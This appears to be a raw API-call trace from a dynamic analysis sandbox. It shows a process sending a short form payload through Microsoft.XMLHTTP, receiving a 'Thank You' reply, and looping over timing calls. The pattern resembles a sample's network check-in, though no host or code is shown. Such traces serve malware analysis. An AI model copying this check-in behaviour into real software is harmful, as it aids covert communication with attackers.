	[0213.245] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=5, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d9c0*(varType=0x8, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1="u=4565&id=plis&k=4565&u=4565", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0213.245] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26cf48 | out: ppvObject=0x26cf48*=0x3cacc0) returned 0x0
	[0213.246] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7feff837e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x5a52f98 | out: ppvObject=0x5a52f98*=0x0) returned 0x80004002
	[0213.246] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0213.246] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26ba48 | out: ppvObject=0x26ba48*=0x3cacc0) returned 0x0
	[0213.247] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), riid=0x7feff83f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), ppvObject=0x115888 | out: ppvObject=0x115888*=0x0) returned 0x80004002
	[0213.247] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0223.539] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0223.539] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf8 | out: ppvObject=0x26dbf8*=0x0) returned 0x80004002
	[0223.539] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd10*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db4c | out: rgDispId=0x26db4c*=10) returned 0x0
	[0223.539] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0223.539] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0223.539] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=10, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="'Thank You: 702527021", varVal2=0x0), pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0223.539] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0223.540] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0223.540] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0223.540] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0223.540] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0223.540] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0x0) returned 0x0
	[0223.540] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0223.541] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0223.541] malloc (_Size=0xb0) returned 0x42e060
	[0223.542] GetTickCount () returned 0x116c9d5
	[0223.542] GetTickCount () returned 0x116c9d5
	[0223.543] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d4a8 | out: ppvObject=0x26d4a8*=0x0) returned 0x80004002
	[0223.543] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26d5c0*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26d3fc | out: rgDispId=0x26d3fc*=7) returned 0x0
	[0223.543] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0223.543] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d180 | out: ppvObject=0x26d180*=0x0) returned 0x80004002
	[0223.543] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=7, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18, pExcepInfo=0x26d1a0, puArgErr=0x26d170 | out: pDispParams=0x26d158*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x42be18*(varType=0x3, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xc8, varVal2=0x0), pExcepInfo=0x26d1a0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d170*=0xffffffff) returned 0x0
	[0223.543] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0223.544] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x1
	[0223.544] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x0
	[0223.544] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0223.546] longjmp () 
	[0223.546] longjmp () 
	[0223.546] longjmp () 
	[0223.547] GetCurrentThreadId () returned 0x9a8
	[0223.547] GetCurrentThreadId () returned 0x9a8
	[0223.547] ??2@YAPEAX_K@Z () returned 0x3e4000
	[0223.547] malloc (_Size=0x80) returned 0x3c88b0
	[0223.547] longjmp () 
	[0223.547] longjmp () 
	[0223.547] longjmp () 
	[0223.547] longjmp () 
	[0223.547] longjmp () 
	[0223.548] longjmp () 
	[0223.548] longjmp () 
	[0223.548] longjmp () 
	[0223.548] longjmp () 
	[0223.548] longjmp () 
	[0223.549] longjmp () 
	[0223.549] longjmp () 
	[0223.549] longjmp () 
	[0223.549] GetTickCount () returned 0x116c9e4
	[0223.549] longjmp () 
	[0223.549] longjmp () 
	[0223.550] longjmp () 
	[0223.550] longjmp () 
	[0223.550] longjmp () 
	[0223.550] longjmp () 
	[0223.550] longjmp () 
	[0223.550] longjmp () 
	[0223.551] longjmp () 
	[0223.551] longjmp () 
	[0223.551] longjmp () 
	[0223.551] longjmp () 
	[0223.551] longjmp () 
	[0223.551] longjmp () 
	[0223.552] longjmp () 
	[0223.552] longjmp () 
	[0223.552] longjmp () 
	[0223.552] longjmp () 
	[0223.552] longjmp () 
	[0223.552] longjmp () 
	[0223.553] longjmp () 
	[0223.553] longjmp () 
	[0223.553] longjmp () 
	[0223.553] longjmp () 
	[0223.553] longjmp () 
	[0223.553] longjmp () 
	[0223.554] longjmp () 
	[0223.554] longjmp () 
	[0223.554] longjmp () 
	[0223.554] longjmp () 
	[0223.554] longjmp () 
	[0223.554] longjmp () 
	[0223.555] GetTickCount () returned 0x116c9e4
	[0223.555] longjmp () 
	[0223.555] longjmp () 
	[0223.555] longjmp () 
	[0223.555] longjmp () 
	[0223.555] longjmp () 
	[0223.555] longjmp () 
	[0223.556] longjmp () 
	[0223.556] longjmp () 
	[0223.556] longjmp () 
	[0223.556] longjmp () 
	[0223.556] longjmp () 
	[0223.557] longjmp () 
	[0223.557] longjmp () 
	[0223.557] longjmp () 
	[0223.557] longjmp () 
	[0223.557] longjmp () 
	[0223.558] longjmp () 
	[0223.558] longjmp () 
	[0223.558] longjmp () 
	[0223.558] longjmp () 
	[0223.558] longjmp () 
	[0223.559] longjmp () 
	[0223.559] longjmp () 
	[0223.559] longjmp () 
	[0223.559] longjmp () 
	[0223.559] longjmp () 
	[0223.560] longjmp () 
	[0223.560] longjmp () 
	[0223.560] longjmp () 
	[0223.560] longjmp () 
	[0223.560] longjmp () 
	[0223.560] longjmp () 
	[0223.561] GetTickCount () returned 0x116c9e4
	[0223.561] longjmp () 
	[0223.561] longjmp () 
	[0223.561] longjmp () 
	[0223.561] longjmp () 
	[0223.562] longjmp () 
	[0223.562] longjmp () 
	[0223.562] longjmp () 
	[0223.562] longjmp () 
	[0223.563] longjmp () 
	[0223.563] longjmp () 
	[0223.563] longjmp () 
	[0223.563] longjmp () 
	[0223.563] longjmp () 
	[0223.564] longjmp () 
	[0223.564] longjmp () 
	[0223.564] longjmp () 
	[0223.564] longjmp () 
	[0223.565] longjmp () 
	[0223.565] longjmp () 
	[0223.565] longjmp () 
	[0223.565] longjmp () 
	[0223.566] longjmp () 
	[0223.566] longjmp () 
	[0223.566] longjmp () 
	[0223.566] longjmp () 
	[0223.566] longjmp () 
	[0223.567] longjmp () 
	[0223.567] longjmp () 
	[0223.567] longjmp () 
	[0223.567] longjmp () 
	[0223.567] longjmp () 
	[0223.568] longjmp () 
	[0223.568] GetTickCount () returned 0x116c9f4
	[0223.568] longjmp () 
	[0223.568] longjmp () 
	[0223.568] longjmp () 
	[0223.568] longjmp () 
	[0223.569] longjmp () 
	[0223.569] longjmp () 
	[0223.569] longjmp () 
	[0223.569] longjmp () 
	[0223.570] longjmp () 
	[0223.570] longjmp () 
	[0223.570] longjmp () 
	[0223.570] longjmp () 
	[0223.571] longjmp () 
	[0223.571] longjmp () 
	[0223.571] longjmp () 
	[0223.571] longjmp () 
	[0223.571] longjmp () 
	[0223.572] longjmp () 
	[0223.572] longjmp () 
	[0223.572] longjmp () 
	[0223.572] longjmp () 
	[0223.572] longjmp () 
	[0223.573] longjmp () 
	[0223.573] longjmp () 
	[0223.573] longjmp () 
	[0223.573] longjmp () 
	[0223.573] longjmp () 
	[0223.573] longjmp () 
	[0223.574] longjmp () 
	[0223.574] longjmp () 
	[0223.574] longjmp () 
	[0223.574] longjmp () 
	[0223.574] GetTickCount () returned 0x116c9f4
	[0223.574] longjmp () 
	[0223.575] longjmp () 
	[0223.575] longjmp () 
	[0223.575] longjmp () 
	[0223.575] longjmp () 
	[0223.575] longjmp () 
	[0223.575] longjmp () 
	[0223.575] longjmp () 
	[0223.576] longjmp () 
	[0223.576] longjmp () 
	[0223.576] longjmp () 
	[0223.576] longjmp () 
	[0223.576] longjmp () 
	[0223.577] longjmp () 
	[0223.577] longjmp () 
	[0223.577] longjmp () 
	[0223.577] longjmp () 
	[0223.577] longjmp () 
	[0223.577] longjmp () 
	[0223.577] longjmp () 
	[0223.578] longjmp () 
	[0223.578] longjmp () 
	[0223.578] longjmp () 
	[0223.578] longjmp () 
	[0223.578] longjmp () 
	[0223.579] longjmp () 
	[0223.579] longjmp () 
	[0223.579] longjmp () 
	[0223.579] longjmp () 
	[0223.579] longjmp () 
	[0223.579] longjmp () 
	[0223.579] longjmp () 
	[0223.580] GetTickCount () returned 0x116c9f4
	[0223.580] longjmp () 
	[0223.580] longjmp () 
	[0223.580] longjmp () 
	[0223.580] longjmp () 
	[0223.580] longjmp () 
	[0223.581] longjmp () 
	[0223.581] longjmp () 
	[0223.581] longjmp () 
	[0223.581] longjmp () 
	[0223.581] longjmp () 
	[0223.581] longjmp () 
	[0223.582] longjmp () 
	[0223.582] longjmp () 
	[0223.582] longjmp () 
	[0223.582] longjmp () 
	[0223.582] longjmp () 
	[0223.583] longjmp () 
	[0223.583] longjmp () 
	[0223.583] longjmp () 
	[0223.583] longjmp () 
	[0223.583] longjmp () 
	[0223.584] longjmp () 
	[0223.584] longjmp () 
	[0223.584] longjmp () 
	[0223.584] longjmp () 
	[0223.584] longjmp () 
	[0223.584] longjmp () 
	[0223.585] longjmp () 
	[0223.585] longjmp () 
	[0223.585] longjmp () 
	[0223.585] longjmp () 
	[0223.585] longjmp () 
	[0223.586] GetTickCount () returned 0x116ca04
	[0223.586] longjmp () 
	[0223.586] longjmp () 
	[0223.586] longjmp () 
	[0223.586] longjmp () 
	[0223.586] longjmp () 
	[0223.587] longjmp () 
	[0223.587] longjmp () 
	[0223.587] longjmp () 
	[0223.587] longjmp () 
	[0223.587] longjmp () 
	[0223.588] longjmp () 
	[0223.588] longjmp () 
	[0223.588] longjmp () 
	[0223.588] longjmp () 
	[0223.588] longjmp () 
	[0223.588] longjmp () 
	[0223.589] longjmp () 
	[0223.589] longjmp () 
	[0223.589] longjmp () 
	[0223.589] longjmp () 
	[0223.589] longjmp () 
	[0223.590] longjmp () 
	[0223.590] longjmp () 
	[0223.590] longjmp () 
	[0223.590] longjmp () 
	[0223.590] longjmp () 
	[0223.591] longjmp () 
	[0223.591] longjmp () 
	[0223.591] longjmp () 
	[0223.591] longjmp () 
	[0223.591] longjmp () 
	[0223.591] longjmp () 
	[0223.592] GetTickCount () returned 0x116ca04
	[0223.592] longjmp () 
	[0223.592] longjmp () 
	[0223.592] longjmp () 
	[0223.592] longjmp () 
	[0223.592] longjmp () 
	[0223.593] longjmp () 
	[0223.593] longjmp () 
	[0223.593] longjmp () 
	[0223.593] longjmp () 
	[0223.593] longjmp () 
	[0223.594] longjmp () 
	[0223.594] longjmp () 
	[0223.594] longjmp () 
	[0223.594] longjmp () 
	[0223.594] longjmp () 
	[0223.594] longjmp () 
	[0223.595] longjmp () 
	[0223.595] longjmp () 
	[0223.595] longjmp () 
	[0223.595] longjmp () 
	[0223.595] longjmp () 
	[0223.596] longjmp () 
	[0223.596] longjmp () 
	[0223.596] longjmp () 
	[0223.596] longjmp () 
	[0223.596] longjmp () 
	[0223.596] longjmp () 
	[0223.597] longjmp () 
	[0223.597] longjmp () 
	[0223.597] longjmp () 
	[0223.597] longjmp () 
	[0223.597] longjmp () 
	[0223.597] GetTickCount () returned 0x116ca13
	[0223.597] longjmp () 
	[0223.598] longjmp () 
	[0223.598] longjmp () 
	[0223.598] longjmp () 
	[0223.598] longjmp () 
	[0223.598] longjmp () 
	[0223.598] longjmp () 
	[0223.598] longjmp () 
	[0223.599] longjmp () 
	[0223.599] longjmp () 
	[0223.599] longjmp () 
	[0223.599] longjmp () 
	[0223.599] longjmp () 
	[0223.600] longjmp () 
	[0223.600] longjmp () 
	[0223.600] longjmp () 
	[0223.600] longjmp () 
	[0223.600] longjmp () 
	[0223.600] longjmp () 
	[0223.600] longjmp () 
	[0223.601] longjmp () 
	[0223.601] longjmp () 
	[0223.601] longjmp () 
	[0223.601] longjmp () 
	[0223.601] longjmp () 
	[0223.601] longjmp () 
	[0223.602] longjmp () 
	[0223.602] longjmp () 
	[0223.602] longjmp () 
	[0223.602] longjmp () 
	[0223.602] longjmp () 
	[0223.602] longjmp () 
	[0223.603] GetTickCount () returned 0x116ca13
	[0223.603] longjmp () 
	[0223.603] longjmp () 
	[0223.603] longjmp () 
	[0223.603] longjmp () 
	[0223.603] longjmp () 
	[0223.603] longjmp () 
	[0223.604] longjmp () 
	[0223.604] longjmp () 
	[0223.604] longjmp () 
	[0223.604] longjmp () 
	[0223.604] longjmp () 
	[0223.604] longjmp () 
	[0223.605] longjmp () 
	[0223.605] longjmp () 
	[0223.605] longjmp () 
	[0223.605] longjmp () 
	[0223.605] longjmp () 
	[0223.605] longjmp () 
	[0223.606] longjmp () 
	[0223.606] longjmp () 
	[0223.606] longjmp () 
	[0223.606] longjmp () 
	[0223.606] longjmp () 
	[0223.606] longjmp () 
	[0223.607] longjmp () 
	[0223.607] longjmp () 
	[0223.607] longjmp () 
	[0223.607] longjmp () 
	[0223.607] longjmp () 
	[0223.607] longjmp () 
	[0223.608] longjmp () 
	[0223.608] longjmp () 
	[0223.608] GetTickCount () returned 0x116ca13
	[0223.608] longjmp () 
	[0223.608] longjmp () 
	[0223.608] longjmp () 
	[0223.608] longjmp () 
	[0223.609] longjmp () 
	[0223.609] longjmp () 
	[0223.609] longjmp () 
	[0223.609] longjmp () 
	[0223.609] longjmp () 
	[0223.609] longjmp () 
	[0223.610] longjmp () 
	[0223.610] longjmp () 
	[0223.610] longjmp () 
	[0223.610] longjmp () 
	[0223.610] longjmp () 
	[0223.610] longjmp () 
	[0223.611] longjmp () 
	[0223.611] longjmp () 
	[0223.611] longjmp () 
	[0223.611] longjmp () 
	[0223.611] longjmp () 
	[0223.612] longjmp () 
	[0223.612] longjmp () 
	[0223.612] longjmp () 
	[0223.612] longjmp () 
	[0223.612] longjmp () 
	[0223.612] longjmp () 
	[0223.612] longjmp () 
	[0223.613] longjmp () 
	[0223.613] longjmp () 
	[0223.613] longjmp () 
	[0223.613] longjmp () 
	[0223.613] GetTickCount () returned 0x116ca23
	[0223.613] longjmp () 
	[0223.614] longjmp () 
	[0223.614] longjmp () 
	[0223.614] longjmp () 
	[0223.614] longjmp () 
	[0223.614] longjmp () 
	[0223.614] longjmp () 
	[0223.614] longjmp () 
	[0223.615] longjmp () 
	[0223.615] longjmp () 
	[0223.615] longjmp () 
	[0223.615] longjmp () 
	[0223.615] longjmp () 
	[0223.616] longjmp () 
	[0223.616] longjmp () 
	[0223.616] longjmp () 
	[0223.616] longjmp () 
	[0223.616] longjmp () 
	[0223.616] longjmp () 
	[0223.616] longjmp () 
	[0223.617] longjmp () 
	[0223.617] longjmp () 
	[0223.617] longjmp () 
	[0223.617] longjmp () 
	[0223.617] longjmp () 
	[0223.618] longjmp () 
	[0223.618] longjmp () 
	[0223.618] longjmp () 
	[0223.618] longjmp () 
	[0223.618] longjmp () 
	[0223.618] longjmp () 
	[0223.619] longjmp () 
	[0223.619] GetTickCount () returned 0x116ca23
	[0223.619] longjmp () 
	[0223.619] longjmp () 
	[0223.619] longjmp () 
	[0223.619] longjmp () 
	[0223.619] longjmp () 
	[0223.620] longjmp () 
	[0223.620] longjmp () 
	[0223.620] longjmp () 
	[0223.620] longjmp () 
	[0223.620] longjmp () 
	[0223.620] longjmp () 
	[0223.620] longjmp () 
	[0223.621] longjmp () 
	[0223.621] longjmp () 
	[0223.621] longjmp () 
	[0223.621] longjmp () 
	[0223.621] longjmp () 
	[0223.622] longjmp () 
	[0223.622] longjmp () 
	[0223.622] longjmp () 
	[0223.622] longjmp () 
	[0223.622] longjmp () 
	[0223.622] longjmp () 
	[0223.623] longjmp () 
	[0223.623] longjmp () 
	[0223.623] longjmp () 
	[0223.623] longjmp () 
	[0223.623] longjmp () 
	[0223.623] longjmp () 
	[0223.624] longjmp () 
	[0223.624] longjmp () 
	[0223.624] longjmp () 
	[0223.624] GetTickCount () returned 0x116ca23
	[0223.626] longjmp () 
	[0223.626] longjmp () 
	[0223.626] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x26d970 | out: lpclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0223.626] SysStringLen (param_1=0x0) returned 0x0
	[0223.626] CoGetClassObject (in: rclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef914e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26d940 | out: ppv=0x26d940*=0x7fef40bac20) returned 0x0
	[0223.626] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef40bac20, riid=0x7fef9156380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x26d948 | out: ppvObject=0x26d948*=0x0) returned 0x80004002
	[0223.626] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef40bac20, pUnkOuter=0x0, riid=0x7fef914ccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d930 | out: ppvObject=0x26d930*=0x47a5aa0) returned 0x0
	[0223.627] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef40bac20) returned 0x1
	[0223.627] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef91563b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26d908 | out: ppvObject=0x26d908*=0x47a5b88) returned 0x0
	[0223.627] ??2@YAPEAX_K@Z () returned 0x3cacc0
	[0223.627] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x47a5b88, pUnkSite=0x3cacc0) returned 0x0
	[0223.627] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d678 | out: ppvObject=0x26d678*=0x0) returned 0x80004002
	[0223.627] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d680 | out: ppvObject=0x26d680*=0x0) returned 0x80004002
	[0223.627] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0223.627] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d860 | out: ppvObject=0x26d860*=0x3cacc0) returned 0x0
	[0223.627] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c680 | out: ppvObject=0x26c680*=0x3cacc0) returned 0x0
